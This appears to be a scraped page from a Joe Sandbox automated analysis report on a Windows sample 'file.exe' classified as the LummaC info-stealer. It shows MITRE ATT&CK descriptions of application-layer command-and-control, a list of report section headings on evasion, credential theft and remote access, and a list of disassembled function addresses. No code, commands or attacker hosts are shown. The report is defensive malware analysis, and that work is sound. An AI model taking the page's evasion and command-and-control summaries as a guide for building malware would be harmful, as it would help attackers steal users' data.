Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
file.exe

Function 000D15F0 Relevance: 28.1, Strings: 22, Instructions: 608
COMMON

Function 000E6F90 Relevance: 25.1, APIs: 5, Strings: 9, Instructions: 579
memoryCOMMON

Function 000BE2A9 Relevance: 12.5, APIs: 1, Strings: 7, Instructions: 531
COMMON

Function 000BA960 Relevance: 9.2, Strings: 7, Instructions: 401
COMMON

Function 000BCE55 Relevance: 9.0, Strings: 7, Instructions: 275
COMMON

Function 000D33A0 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Function 000DBFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461
COMMON

Function 000E6C40 Relevance: 6.5, Strings: 5, Instructions: 265
COMMON

Function 000BC36E Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Function 000DC6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614
COMMON

Function 000DBFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456
COMMON

Function 000B97B0 Relevance: 5.4, Strings: 4, Instructions: 396
COMMON

Function 000D6170 Relevance: 5.3, Strings: 4, Instructions: 318
COMMON

Function 000B87F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
COMMON